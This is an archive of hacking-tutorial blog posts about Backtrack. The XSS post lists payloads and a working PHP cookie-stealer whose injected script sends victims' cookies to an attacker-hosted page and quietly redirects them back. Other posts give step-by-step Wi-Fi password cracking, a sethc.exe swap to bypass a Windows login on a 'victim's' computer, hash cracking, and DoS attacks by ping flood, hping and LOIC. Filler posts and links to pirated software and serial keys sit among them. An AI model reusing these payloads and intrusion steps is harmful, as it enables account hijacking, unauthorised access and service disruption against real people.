Showing posts with label Backtrack. Show all posts
Showing posts with label Backtrack. Show all posts

Cross Site Scripting (XSS)

Monday, 18 June 2018

Cross Site Scripting (XSS)
===============================
Definition => Cross-site Scripting (XSS) attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user. Flaws that allow these attacks to succeed are quite widespread and occur anywhere a web application uses input from a user in the output it generates without validating or encoding it.

The ability to inject code into the Web page generated, potential threats. An attacker can use XSS vulnerabilities to steal cookies, hijack accounts, execute ActiveX, execute Flash content, force you to download software, and take action on your hard disk and data.

If you look more closely at the URL, it might actually exploit a vulnerability in your bank’s Web site, and look something like http://www.website.com/somepage?redirect=<script>alert(‘XSS’)</script>, where the use of the “redirect” parameter has been exploited to carry out the attack.

**************************
ALL about SQL Injection and Defence
What is Session
Fun with computers => make-folder-without-name
********************************************************

XSS are 3 types
==================
Stored XSS (AKA Persistent or Type I)
Stored XSS generally occurs when user input is stored on the target server, such as in a database, in a message forum, visitor log, comment field, etc. And then a victim is able to retrieve the stored data from the web application without that data being made safe to render in the browser

Reflected XSS (AKA Non-Persistent or Type II)
Reflected XSS occurs when user input is immediately returned by a web application in an error message, search result, or any other response that includes some or all of the input provided by the user as part of the request, without that data being made safe to render in the browser, and without permanently storing the user provided data. In some cases, the user-provided data may never even leave the browser

DOM Based XSS (AKA Type-0)
DOM Based XSS is a form of XSS where the entire tainted data flow from source to sink takes place in the browser, i.e., the source of the data is in the DOM, the sink is also in the DOM, and the data flow never leaves the browser. For example, the source (where malicious data is read) could be the URL of the page (e.g., document.location.href), or it could be an element of the HTML, and the sink is a sensitive method call that causes the execution of the malicious data (e.g., document.write)."

URL fragments (use to go something inside javascript | Something coming after # (hash) will not go to the server.


Attacks can be done by XSS
==========================================
> steal cookies (if they are not httpOnly)
> retrieve the current page that the victim sees (as the victim user)
> get the current URL of the victim
> get the current referrer of the victim
> Redirect to some other website
> use the application cookies to gain access to the victim’s account
> use possible CSRF (cross-site request forgery) vulnerabilities to make the victim perform unwanted actions in the application (e.g. add a new user)
> inject malicious code into victim’s browser in order to exploit browser vulnerabilities
> inject malicious Java applet, etc

Mitigation
===============
> Input validation  both client and server side
> Output encoding
> White listing of words
> OWASP escapi

JavaScript functionality
==============================
Window object
Windows Object Properties
1) window.locate
<script>window.location.href="htts://www.google.co.in"</script>

2) document.body.innerHTML
<script>document.body.innerHTML="<style>body{visibility:hidden;}</style><div style=visibility:visible;><h1>THIS SITE WAS HACKED</h1></div>";</script>


XSS Cases
===================
Case 1 :
When there is no input validation and no output encoding use simple payload
<script>alert(9)</script>
<svg/onload=alert(9)>
“><img src=x onerror=alert(1);>

Case 2 :
When value is going inside value Case (value= "something">) then try to put payload outside the double quotes
"><script>alert(9)</script>
"><svg/onload=alert(9)>

Case 3 :
Try inject payload all the possible parameters, input boxes, dropdown list and hidden fields like
input boxes
search?q=
value=' '
drop down list value going in a parameter
p=something (Hidden) (intercept with the burp-Suite)

Case 4 :
when input box has limitation of alphabets to be written in it. Then right click on input box choose inspect element and change the number to max (so that u can write your payload)
value = "><svg/onload=alert(9)>

Case 5 :
When you are getting output encoding inside the value tag then try to make payload using event handlers like onmouseover or onmouseclick
Even see what all things are output encoded and escaped
123" onmouseover="alert(9);
asd" onmouseclick="alert(9);
When server is escaping special characters like " or ' then payload be
123 onmouseover=alert(9);

Case 6 : 
A thumb rule for href tag is that when any input is making a hyperlink just give him a simple payload
javascript:alert(9)
and you get the alert box
hyper link payloads
<a href="http:google.com" onclick=javascript:alert(9)> for always a link created
www.google.com" onclick="confirm(9)"> href payload

Case 7 : 
When server is removing some words or alphabets the try to covert that words in base64 to bypass
"><script>eval(atob('YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ=='));</script>
"><script>eval(alert(document.domain))</script>

Case 8 :
the words script, style and on aren't allowed, we have to think about something else this time. Apparently, it's possible to encode JavaScript as Base64 and make it execute as an iframe src.

<iframe src="data:text/html;base64, .... base64 encoded HTML data ....">

The HTML data we want to use is:
<script>parent.alert(document.domain);</script>

parent. is needed because we want the alert to execute in the context of the parent's window. Encoding it as Base64 with the Character Encoding Calculator results in:

PHNjcmlwdD5wYXJlbnQuYWxlcnQoZG9jdW1lbnQuZG9tYWluKTs8L3NjcmlwdD4

The code that we will then put into the search box to finish the level is:

"><iframe src="data:text/html;base64,PHNjcmlwdD5wYXJlbnQuYWxlcnQoZG9jdW1lbnQuZG9tYWluKTs8L3NjcmlwdD4="></iframe>


Case 9 : 
Sometimes playing with html tags also leads to XSS
for example :
closing of a textarea and then putting a payload leads to stored XSS
payload :
</textarea><svg/onload=alert(9)>

Case 10 :
Sometimes putting a parameter and then a payload leads to reflective XSS
for example
we have an url http://www.website.com/forgotpassword
change to
url http://www.website.com/forgotpassword?aa=<script>alert(9)</script>

Case 11 :
When some input is going inside <script> </script> the we have to only put "-alert(9)-"
it is vulnerable to XSS

Case 12 : DOM BASED XSS
For example:
1)
Assume that the URL
http://www.vulnerable.site/welcome.html

contains the following content:
<HTML>
<TITLE>Welcome!</TITLE>
Hi
<SCRIPT>
var pos=document.URL.indexOf("name=")+5;
document.write(document.URL.substring(pos,document.URL.length));
</SCRIPT>

Welcome to our system
…</HTML>
This page will use the value from the "name" parameter in the following manner.
http://www.vulnerable.site/welcome.html?name=Joe
In this example, the JavaScript code embeds part of the document.URL (the page location) into the page, without any consideration for security. An attacker can abuse this by luring the client to click on a link such as
http://www.vulnerable.site/welcome.html?name=
<script>alert(document.cookie)</script>

2)
<script>

var h = document.location.hash.substring(1);
if (h && h != ""){
 var re = new RegExp(".+@.+");
 if (h.match(re)){
document.getElementById("email").innerHTML+="("+h+")";
}
}
</script>
payload = <img/src=x onerror=alert(9)>@gmail.com
==============
IMP :-
Attribute's value field (with the " character escaped to &#34). Escaping ASCII characters can easily be done through this character encoding calculator: http://ha.ckers.org/xsscalc.html.
============================================================================================================================


**************************
ALL about SQL Injection and Defence
What is Session
Fun with computers => make-folder-without-name
**************************************************

Exploitation With XSS
=========================
IMP => https://www.exploit-db.com/papers/13057/
   https://www.exploit-db.com/docs/15530.pdf
http://internet.wonderhowto.com/how-to/hack-remote-internet-browser-with-xss-shell-261948/

Exploit 1 :
Attacker can redirect victim to the malicious website
payload :
<script>alert("click ok to redirect");window.location.href="https://www.google.com"</script>

Attacker can make victim to download any malicious file to download
payload
<script>document.location="http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe";</script>

Exploit 2 :
Attacker can steal cookies of the victim
How to do it :
In stealing cookies, there is a 3 step process
attacker needs
1)injected script
2)cookies stealer
3)log file

Create an account on a server and create two files, log.txt and cookiestealer.php. You can leave log.txt empty. This is the file your cookie stealer will write to. Now paste following php code into your cookie stealer script (cookiestealer.php):

cookiestealer code :

<?php

function GetIP()
{
if (getenv("HTTP_CLIENT_IP") && strcasecmp(getenv("HTTP_CLIENT_IP"), "unknown"))
$ip = getenv("HTTP_CLIENT_IP");
else if (getenv("HTTP_X_FORWARDED_FOR") && strcasecmp(getenv("HTTP_X_FORWARDED_FOR"), "unknown"))
$ip = getenv("HTTP_X_FORWARDED_FOR");
else if (getenv("REMOTE_ADDR") && strcasecmp(getenv("REMOTE_ADDR"), "unknown"))
$ip = getenv("REMOTE_ADDR");
else if (isset($_SERVER['REMOTE_ADDR']) && $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'], "unknown"))
$ip = $_SERVER['REMOTE_ADDR'];
else
$ip = "unknown";
return($ip);
}

function logData()
{
$ipLog="log.txt";
$cookie = $_SERVER['QUERY_STRING'];
$register_globals = (bool) ini_get('register_gobals');
if ($register_globals) $ip = getenv('REMOTE_ADDR');
else $ip = GetIP();

$rem_port = $_SERVER['REMOTE_PORT'];
$user_agent = $_SERVER['HTTP_USER_AGENT'];
$rqst_method = $_SERVER['METHOD'];
$rem_host = $_SERVER['REMOTE_HOST'];
$referer = $_SERVER['HTTP_REFERER'];
$date=date ("l dS of F Y h:i:s A");
$log=fopen("$ipLog", "a+");

if (preg_match("/\bhtm\b/i", $ipLog) || preg_match("/\bhtml\b/i", $ipLog))
fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE{ : } $date | COOKIE:  $cookie <br>");
else
fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host |  Agent: $user_agent | METHOD: $rqst_method | REF: $referer |  DATE: $date | COOKIE:  $cookie \n\n");
fclose($log);
}

logData();

?>

This script will record the cookies of every user that views it.

Now find a XSS vulnerable page or parameter or search box and put the payload
"><script language= "JavaScript">document.location="http://yoursite.com/cookiestealer.php?cookie=" + document.cookie;document.location="http://www.whateversite.com"</script>

yoursite.com is the server you're hosting your cookie stealer and log file on, and whateversite.com is the vulnerable page you're exploiting. The above code redirects the viewer to your script, which records their cookie to your log file. It then redirects the viewer back to the unmodified search page so they don't know anything happened.

Exploit 3 : 
Attacker can deface a page with its own page or pic or photo
Palyload
<img src=link of the image>
<script>document.body.innerHTML="<style>body{visibility:hidden;}</style><div style=visibility:visible;><h1>THIS SITE WAS HACKED</h1></div>";</script>

Exploit 4 :
BEF = Browser Exploitation Framework

http://www.hacking-tutorial.com/hacking-tutorial/xss-attack-hacking-using-beef-xss-framework/#sthash.kypFITWL.dpbs



Wifi hacking with GERIX in BACKTRACK

Saturday, 11 August 2012

I showed you how to hack wifi with Terminal in BACKTRACK :: To know how to hack wifi with terminal in BACKTRACK => Click on me :))
Great response for this blog of mine :: Thanks to all my Readers

But many of my friends and readers said "its very difficult to learn all the commands and sometimes many problems comes and we go wrong with commands give us something that help us to hack wifi easily and in GUI version

So HERES' THE SECRET  to hack wifi with GERIX in BACKTRACK
GUI version of hacking WIFI
SO Guys here are the steps to do it
Open up ur BACKTACK
then Click on

Application => Backtrack => Exploitation tools => Wireless Exploitation =>WLAN Exploitation => gerix wifi cracker-ng

Click on Gerix wifi cracker

A window will open naming  Gerix wifi cracker
*******************
Backdoor help of Backtrack => Click on me :))
Put theme on ur Facebook => Click on me :))
recover jpeg files with Backtrack => Click on me :))
*************************************************
Now here are the Hacking Steps

Click on Configuration
            then there will be a interface name wlan0 (select it) and click on Enable/Disable Monitor mode
selecting Enable/Disable Monitor mode mon0 will be enabled, select it and then go to target network and in Channel select ALL and then click on Rescan networks

Basically i am telling you about how to hack WEP keys easily, after words how to hack WPA and WAP2 keys

ok after scanning all the networks you will find list of wifi with their names and ENCryption like WEP WPA and WPA2 :: select WEP encrypted wifi.

then look at above side you will find WEP written after Configuration :: Click on it

You will have some General Functionalities
In sub menu :: you will find FUNCTIONALITIES written :: in that there will be written
                        STart sniffing and LOgging :: click on it and a terminal will open with the BSSID of the wifi you selected before and channel name too

See downwords  it will showing WEP attacks (no-client) :: click on it
now go to FRagmentation attack

then just u have to click one by one ::  here do it like this

after opening options of fragmentation attack
             click on the fragmentattion attack the second option ::: terminal will open it will be asking you use this packets type "y" and press enter and look it will show u a file name with extension .xor file "now this is the file were wifi password is saved ::

after getting it click on CReate the ARP packet to be injected on the victim access point
     after that click on INject the created packet on victim acess point :: terminal will open it will be asking you use this packets type "y" and press enter
after pressing enter you will see you packets are being sent at very high speed :: wait till the packets reach too 25000 - 30000
after the packets have reached to this limit

look above there will written CRacking were configuration was written the third last option ::click on it
©Pprasoon Nigam
when u will click on it there will be a option naming "AIRcrack-ng - Decyrpt WEP Password"
Click on it and just relax back BACKTRACK WILL CRACK THE PASSWORD OF THE WIFI :))

Make Backdoor help of BACKTRACK Terminal

Thursday, 12 July 2012

In previous blog i showed you how to make backdoor when u have system on with u :: means to say that u have windows running in front of u and no logon password is there on the computer

Many of asked me what to do when u have access to the system but having password on the logon and u can't open it and how to make a backdoor in it ::

It was great question asked to me :: so as u know i am fond of learning backtrack i get to know that we can also make backdoor in system (having windows 7) help of the BACKTRACK

So HERES' THE SECRET 

how to make a backdoor when there is no logon password in it or u have accessed to the computer and can enter into the system 32 :: to know the steps => Click on me :))

And the second thing :: How to make a boot-able BACKTRACK pen-drive => Click on me :))

********************
How to recover JPEG file with Backtrack => Click on me :))
How to install SKYPE in Backtrack => Click on me :))
NMAP Tutorials =>Click on me :))
Download all Backtrack O.Ss => Click on me :))
********************************************************

So here are the steps to make a backdoor help of BACKTRACK TERMINAL

after making a bootable backtrack pen-drive :: insert the pendrive and set the boot priority to USB PORT or EXTERNAL HARDWARE

then ur backtrack will be running on the system ::

now open the terminal in the backtrack

and type in the following commands

* cd /media
** ls and press enter
*** then ur hard disk code will be shown (for ex: 28EC168........) something like this :: every hard-disk have their own code
NOTE:- when u could not the see the code repeat the step again or click on the "Places" (see in the backtrack above were there is terminal icon) then in places click one "filesystem" a window will open you will shown the hard-disk code as a title in blue :: the next step
**** (type) cd /media/(type the) hard-disk code and press enter
***** then type in ls and press enter
****** u will be seeing all the folders that are present in your C drive like Windows or Recovery etc etc
****** (then type) cd /media/(type the) hard-disk code/Windows and press enter
******* (then type) cd /media/(type the) hard-disk code/Windows/System32 and press enter
********  then u can type ls to see all the list of files & folders present in system32
********* then type in cp cmd.exe sethc.exe

     after changing sethc.exe to cmd.exe you can exit the terminal and reboot ur computer and and remove your pen-drive and
when logon screens comes asking for password
then just hit shift key 5 time and cmd.exe will open

and then type in command prompt

net user (name of your computer) *
   for example net user pprasoon * 

and then press enter two times :: it will be asking for new password u have leave it blank and then just relax and reboot your computer and yes its done no password is there on the victims computer

This is the Process to make BACKDOOR HELP BACKTRACK TERMINAL ON THE VICTIMS COMPUTER

*********************
Work on 4 Screens in Windows 7 => Click on me :))
Add ur Image on a MP3 file => Click on me :))
Convert ur image in ASCII code => Click on me :))
Learn About Virtual Machine and be Safe => Click on me :))
************************************************************

NOW HERE IS THE SECOND WAY TO MAKE BACKDOOR HELP OF BACKTERACK but not with the TERMINAL but help of OPENING THE DRIVE

HERES' THE SECRET

HOW TO DO IT

open ur backtrack help of pen-drive

* wait till backtrack desktop comes
** then click on places (above u will see)
*** then u will see ur deives
                  one will be system reserved (do not touch that drive)
                      next will the drive with name filesystem that will be C drive open it
**** you will see all the folder that present in C drive :: like Windows Users and many more
***** then open ur windows and then open system32
****** now search for the cmd.exe
                                                         and rename it sethc.exe
and replace with the original sethc,exe

volla you have done it :: and now just close all the windows and reboot the your system for windows removing pendrive

now when logon screens comes just press shift key 5 time your command prompt will open
now type in there

net user (name of your computer) *
   for example net user pprasoon *
and then press enter two times :: it will be asking for new password u have leave it blank and then just relax and reboot your computer and yes its done no password is there on the victims computer

©Pprasoon nigam
This is the Process to make BACKDOOR HELP BACKTRACK without TERMINAL ON THE VICTIMS COMPUTER

****************(~__^)********************
Hack Wifi with GUI version in BACKTRACK => Click on me :))

Recover JPEG files with BACKTRACK

Thursday, 24 May 2012

How to recover ur memorable JPEG files with the help of Backtack 5 ?

Heres' the SECRET

in Backtrack 5 there is a software name revcoverjpeg which helps u to recover all ur jpeg file :) :))

*******************
Install skype on backtrack => Click on me :)
Advantages of Virtual Machine => Click on me :)
Binders => Click on me :)
********************************

now how it works

insert the backtrack 5 bootable usb

How to make bootable backtrack USB => Click on me_1 :)
                                                                          Click on me_2 :)

after opening the backtrack 5 with help or ur USB

open ur terminal/knosole in backtrack 5

now type in commands

cd Dsesktop

mkdir Pprasoon  (we are making a new folder on desktop)

then type cd Pprasoon

now type in fdisk -l (this will show u all ur hard drives with their space)

****************
Hide ur imp hard drives => Click on me :)
Send Email the date u want => Click on me :)
Lock ur fav folder => Click on me :)
***********************************

then type in the main command to get ur jpeg files

recoverjpeg /dev/sda1
(*sda1is the name or ur first harddrive, u can use sda2 for second, sda3 for third and as many as u want but one by one)

if the above command doesn't work then this means the software is not installed :: to install the software

type in aptget install revcoverjpeg and press enter and  then do all the above things

after doing all this work open ur folder made on desktop name Pprasoon and see all your photos

© Pprasoon Nigam

Do join with me on my FACEBOOK profile => Click on me :)

Install SKYPE in backtrack 5

Thursday, 3 May 2012

Skype great software :: having great features

* free calls
** free videos calls
*** free both video call and call at same time

****************************
Add image in mp3 file => Click on me :)
Fun with Konsole / terminal in backtrack 5 => Click on me :)
**************************************************

Ok so today i am telling u up

HOW TO INSTALL SKYPE SOFTWARE IN BACKTRACK 5

HERES' THE SECRET

open up ur backtrack 5 and see it is connected to internet

now open up this site =>  http://www.skype.com/intl/en/get-skype/

then click on download and select ubuntu 32 bit and download it  and save it to desktop

now open your terminal / konsole in backtrack and type in

dpkg -i

then drag and drop the file (skype) u downloaded on desktop and hit enter :: and just then u r done

****************************
Hack wifi => Click on me :)
Nmap tutorials for backtrack => Click on me :)
************************************************

vollla its installed :: then go to the Applications then in sub menu go to internet and internet u will see skype is there :: :)

©Pprasoon nigam

Here is the video tutorial of the above => Click on me :)

Fun with Terminal/Konsole Backtrack 5

Tuesday, 1 May 2012

I know hacking is great fun but sometimes we want some fun rather then hacking
i mean to say to impress someone :: to show how we work with backtrack and to show backtrack is easy and i play with backtrack

**********************************
Crack hash with Backtrack 5 => Click on me :)

How to hack Wifi =>  Click on me :)
*******************************************


Now here is some fun with Backtrack Terminal / Konsole

HERES' THE SECRET


To see the Video tutorial => Click on me :)


what u gonna do is open ur terminal
and type in there

apt-get install cmatrix and hit enter

cmatrix will install
after cmatrix is installed

type in cmatrix and hit enter and matrix coding will start in terminal



Next u type in

apt-get install sl and hit enter

when sl is installed then type in sl -laf and hit enter
and see the magic a train will be moving

*************************************
Nmap tutorials backtrack 5 => Click one me :)

Safe your Wifi From being Hacked => Click on me :)

***************************************************

The third and the last one type in

apt-get install cowsay and hit enter

cowsay will be installed :: when cowsay is installed

type in  cowsay "hello"  and hit enter and see cow will say hello

Volla have fun with all these things and impress everyone

©Pprasoon nigam

Cracking Hash BACKTRACK 5

Friday, 13 April 2012

HOW TO CRACK HASH OR MD5 HASH OR TO DECODE THESE HASH ?
HELP OF JOHN THE RIPER


HERES' THE SECRET


What all u need is Backtrack 5

TO Download backtrack 5 => Click on me

To make a bootable backtrack pendrive => Click on me

and how to hack someone WIFI =>Click on me


So after getting backtrack 5

Here are the steps how to do it

*Copy the md hash in to the gpedit (notepad in backtrack) and save any name u want i save as hash.txt

** Now copy and paste that file (hash.txt) in the root folder

*** Now open the terminal in the backtrack and type

    Here are the commands

            cd (space) /pentest/passswords/hash  press enter

then the second command is

             ./hash --format =raw-MD5 (space) /root/hash.txt    and press enter



Now here is a website for FREE which will help the decode hash file online

TO BOOM the website  => Click on me :)


© Pprasoon nigam

Convert ur image to ASCII with Backtrack

Saturday, 31 March 2012

We make many or search many sms or photos in ASCII

now it will be not a problem now u can make any image or even ur image in ASCII
How to do it

Heres' the SECRET


** Open ur backtrack 5

*** in that open terminal
*** and type in command

apt-get install jp2a   this command will install the software ::

then put any ur image or any image having extension jpg on the dekstop

then type the command

cd Desktop and hit enter

then type command

ls to check the list of all the image u have in ur desktop in backtrack 5 :)


then command to convert the image is

jp2a (name of the image with extension .jpg) and press enter

like for example

jp2a pprasoon.jpg and press enter ur done ::


heres' the video tutorial see and do it ::  Click on me


© pprasoon nigam

NMAP Tutorial (BACKTRACK)

Tuesday, 6 March 2012

What is NMAP ?

HERES' THE SECRET

Nmap (Network Mapper) is a security scanner used to discover hosts and services on a computer network, thus creating a "map" of the network. To accomplish its goal, Nmap sends specially crafted packets to the target host and then analyzes the responses. Unlike many simple port scanners that just send packets at some predefined constant rate, Nmap accounts for the network conditions during the run.
Nmap has been able to extend its discovery capabilities beyond simply figuring out whether a host is up or down and which ports are open and closed

NMAP can determine the
                             operating system of the target,
                                       names and
                                              versions of the listening services,
                                                          estimated up time,
                                                                      type of device,
                                                                                and presence of a FIREWALL.

Nmap runs on
                       Linux,
                                Microsoft Windows,
                                                Solaris
                                                     ,HP-UX
                                                           and
                                                               BSD
 Linux is the most popular Nmap platform with Windows following it closely

****************************
Hack WIFI with the GUI version in BACKTRACK => Click on me :))
******************************************

Features of NMAP

Nmap features include:
  • Host Discovery – Identifying hosts on a network. For example, listing the hosts which respond to pings or have a particular port open.
  • Port Scanning – Enumerating the open ports on one or more target hosts.
  • Version Detection – Interrogating listening network services listening on remote devices to determine the application name and version number
  • OS Detection – Remotely determining the operating system and some hardware characteristics of network devices.
  • Scriptable interaction with the target – using Nmap Script Engine  [WIKIPEDIA HELP]
**********
Make BACKDOOR help of BACKTRACK TERMINAL => Click on me :))

*********************************
COMMANDS OF NMAP

Open ur konsole in backtrack and type all the commands and see their working and do connect to internet also :)

* type nmap and press enter :: to see all the commands of nmap

** Nnow how to scan ips in range and to see how many are alive :: command is
           nmap -sP 192.168.254.0/24
*** Now how to scan ip in a specific range :: command is
            nmap -sP 192.168.254.99-106
like we are scanning ip from 99 to 106

**** Now we will do stealth scan to see how many ports are open on the specific ip :: command is
            nmap -sS 192.168.254.102 and press enter
***** Now to find what operating system running on the ip address :: command is
             nmap -O 192.168.254.102

****** Now to scan for TCP connect :: command is
             nmap -sT 192.168.254.102

******* Just a null scan to check wether ip is alive or not :: command is
             nmap -sN 192.168.254.102

******** Now to scan for UDP connect :: command is
             nmap -sU 192.168.254.102

********** To scan for IP Protocol :: command is
            nmap -sO 192.168.254.102

*********** To check  ACKNOWLEGMENT (ACK) :: command is
            nmap -sA 192.168.254.102
************* To scan for which windows is running :: command is
            nmap -sW 192.168.254.102

© pprasoon nigam

SECRET FINALLY REVEALED 100th POST

Wednesday, 25 January 2012

THIS MY 100th POST THAT IS BEING REVEALED

A VERY WARM THANKS TO EVERY USER WHO READ ALL MY BLOGS AND APPRECIATED IT :: I AM VERY THANK FULL TO U ALL THE KNOWLEDGE I SHARED WITH U ALL

TODAY IS NOTHING NEW BUT LINKS SOME SHORTCUTS JUST CLICK AND IT WILL BE REVEALED

"""FACT..." The person who cares lot for others..........is the one who needs more care than others. The person who makes other laugh & smile all time..........is the one who holds lot of pain in heart. The person who tries to be a good friend to all..........is the one who needs a best friend for own. The person who always smiles & says I'm fine..........is the one who is broken at heart but still strong enough to believe that at the end everything is going to be fine!! """

My facebook account =>  Click on me

How to hack WIFI => Click one me
How to safe WIFI => Click on me
Tips to secure ur WIFI => Click on me

Backdoor hacking => Click on me

keep ur laptop/computer safe => Click on me

Ophcrack tutorial =>  Click one me    Click on me 2

Self destructive email => Click on me

Alt code trick => Click on me

Gmail 2 way verification (more safety to gmail) => Click on me

Windows 7 shortcut => Click on me

TO know no. of unknown sim => Click on me

List of Run commands of Windows 7/xp/vista => click on me

Open block websites => Click on me

Internet Pendrive => Click on me

Notepad Virus => Click on me

Countermeasures => Click on me
                                     Click on me 2
                                     Click on me 3

BEST TORRENT SITES

* http://isohunt.com/
** http://torrentz.eu/
*** http://www.torrenttree.com/
**** http://thepiratebay.org/

Some hacking Books

Download hacking books

CEH Official guide =>  Click on me
Hacking Firewalls => Click on me
Gray Hat Hacking => Click on me
Hacking Exposed => Click on me


Video tutorials all in HD

UNETBOOTIN => Click on me

Hide Drive with CMD => Click on me

Break windows 7 password => Click on me

How to fool keylogger => Click on me

Do join my blog and get free software with full serial key :: updates antivirus with serial key :: anything u want
Be safe from being hacked
Now more safe and amazing trick will come

Yours truly
Pprasoon Nigam
CEH

THANKS FOR READING 100th POST

SECRETS FINALLY REVEALED

 Look more about  us => http://www.fraternityindia.in/


The 100th Blog dedicated to some of my special persons who helped me

Yashi Prakash

Aditya Mukherjee
bossi
Deepak dutt srivastava brother

Diffrent Ways to DOS ATTACK

DOS ATTACK  <=>    Denial-of-service attack

What is Dos Attack ?
A denial-of-service attack (DoS attack) or distributed denial-of-service attack (DDoS attack) is an attempt to make a computer or network resource unavailable to its intended users


A DoS attack can be perpetrated in a number of ways. The five basic types of attack are:

* Consumption of computational resources, such as bandwidth, disk space, or processor time.
** Disruption of configuration information, such as routing information.
** Disruption of state information, such as unsolicited resetting of TCP sessions.
*** Disruption of physical network components.
****Obstructing the communication media between the intended users and the victim so that they can no longer communicate adequately.

A DoS attack may include execution of malware intended to

* Max out the processor's usage, preventing any work from occurring.
** Trigger errors in the microde of the machine.
*** Trigger errors in the sequencing of instructions, so as to force the computer into an unstable state or lock-up.
**** Exploit errors in the operating system, causing resource starvation and/or thrashing, i.e. to use up all available facilities so no real work can be accomplished.
***** Crash the operating system itself                              [Wikipedia help]


  • How To Put a DOS ATTACK In Different Ways

    Heres' the SECRET

    First Method :: DOS Attack by CMD (command prompt)

    open ur cmd (window key + r)

    then type nslookup for the website ip

    for eg. nslookup www.google.co.in

    after finding the ip now ready for dos attack

    type in command
    ping website-IP -l 65500 -n 10000000 -w 0.00001

    -n 10000000= the number of DoS attemps.. u can change the value "10000000" with ur desiredvalue u want to attempt attack.

    website-IP= Replace the text with the ip address of the site u want to be attacked..

    -w 0.00001 = It is the waiting time after one ping attack.

    for eg: if the ip address is 112.158.10.2

    just type

    ping 112.158.10.2 -l 65500 -n 10000000 -w 0.00001


    Dos attack with backtrack ::
    Open ur konsole and type these method and ur done


    Step *
    host (website name )   [get the ip address of website]

    Step **
    hping -i u100 -S -p 80 (ipaddress of website)


    Dos attack with LOIC Software

    All the above method are manual method :: now here goes a software name call LOIC

    Loic is a tool used for DDOS (distributed denial-of-service) attack on a website!

    To download the LOIC software => Click on me


    Note ::  Dos attack can be done or they are just effective for the small website :: do not put dos attack on big website it will not work :: or try to have 40 to 50 computers to put dos attack on big website and never put dos attacks on google, yahoo, bing :: these big website u will be caught and no use will be made of ur dos attack ::


    Now fun with Dos attack

    ** Put dos attack on some ones computer ip his computer internet gets slow :: even computer also gets hang ::

    ** Put Dos attack on some ones wifi (BSSID) :: wifi connection speeds gets slow and the all the person using wifi gets low or very slow speed of internet ::


    Do all hackings and tricks for ethical use

    With regards
    Pprasoon nigam
    Join me for more tricks and free help and get job part time to full time => Click on me

Download backtrack O.S

Friday, 13 January 2012

Download Backtrack all version

Here are the links to backtrack O.S with maximum seeds so that u can download easily ::

Backtrack 3 => Click on me

Backtrack 4 => Click on me

Backtrack 4 r1 => Click on me

Backtrack 4 r2 => Click on me

Backtrack 5 => Click on me

Backtrack 5 r1 => Click on me

Backtrack 5 r2 => Click on me

Backtrack 5 r3 BlackHat Edition => Click on me
                                                           Click on me

To make backtrack boot-able Pen-drive => Click on me

How to  hack wifi :: Wifi hacking with backtrack
=>  Click on me

Wifi Hacking

Saturday, 7 January 2012

Ok now how to hack some ones wifi with the help of  BACKTRACK

Heres' the SECRET

Make a backtrack boot-able pen-drive :: Now how to make bootable backtrack pendrive => Click on me

after making backtrack bootable pendrive

insert the pendrive and open ur BACKTRACK in ur laptop :: Y laptops beacause laptops has wifi card (hardware) and software in it ::

***************************
Now hack WIFI with GERIX software in BACKTRACK => Click on me :))
*********************************
Now open 3 things in backtrack

1st konsole
2nd konsole
and a notepad to copy paste some items

You must know some words what they do

wireless key - security key
essid - network name
ifconfig - Enables your wireless device
iwlist - lists available access points
iwconfig - configuring wireless connection
dhclient - to get an ip address via DHCP

IMP Note :: use space, lowercase, uppercase and spellings in right way then only commands will work ::

Now here are the steps to attack and get wifi password

Open ur 1st konsole and type in

airmon-ng (press enter)
airmon-ng start wlan0 (0 is zero) (press enter)
airodump-ng mon0 (0 is zero)

You can see bssid and stations (know as client mac)

now press ctrl+c for break

now copy the bssid and station into the notepad

after copying it type this command in 1st konsole

airodump-ng -w capture --bssid (paste the bssid u copied) -c (channel no.) mon0 (0 is zero)

after the packets has been sent to around 10,000 or 20,000

most imp part we have to do handshake with wifi :: for handshake

open 2nd console type in

aireplay-ng --deauth 1 -a (paste the bssid) -c (paste the station) mon0

a handshake will be shown on 1st konsole

now go back to the 1st knosole

press ctrl+c

then type

aircrak-ng capture -01.cap -w ./wordlist.lst (press enter)

and vollllaaaa  here we go we have got the password of the wifi

Now here is the best video tutorial demonstrated
To download the Video => ClicK one me

For any query please mail = fraternity.contacts@gmail.com

Please use this for legal purpose only ::  its for education do not try on any ones wifi illegally ::

Soon i will be posting how to be safe from wifi hacking and even who is connected to ur wifi illegally :)

How to keep ur wifi safe => Click on me


***********************(~_^)*********************
Hack WIFI with the Help of GUI version in Backtrack => Click on me :))

How To Make backtrack & Windows bootable PENDRIVE

How to make pen-drive boot-able for Backtrack and Windows

Heres' the SECRET

To make Windows operating system bootable  Go to this Link => Click on me

To make a Backtrack bootable pendrive

Here is the SECRET

Use a software name call UNetBootin

To download the software => Click on me

How to make this software work ?
Download BACKTRACK O.S
To Download BACKTRACK Click on the following link

Backtrack 3 => Click on me

Backtrack 4 => Click on me

Backtrack 4 r1 => Click on me

Backtrack 4 r2 => Click on me

Backtrack 5 => Click on me

After downloading the image file of any Backtrack O.S from the above ..
Open the software name UNETBOOTIN

U will see a option name given "Diskimage" and then select the image file (.iso file) of the backtrack u have downloaded

then there will be a option name 'Type" ::  in this select the pendrive or the usb or the memory card to make bootable backtrack .. (We are installing files of backtrack in the drives)

To be more clear here is video tutorial => Click on me

After making a bootable pendrive reboot
Goto your BIOS and then go to the option  boot and select "usb" as your first priority

then press F10 and save ok

and volla its done


Many of you them will be getting problem that backtrack is not opening
GUI is not coming of the backtrack

Send mail on fraternity.contacts@gmail.com
  
                 OR

you have to type two commands first command is fixvesa
and another command is startx

TO recover all your problems here the video tutorial how to get GUI interface

To see the video tutorial => Click on me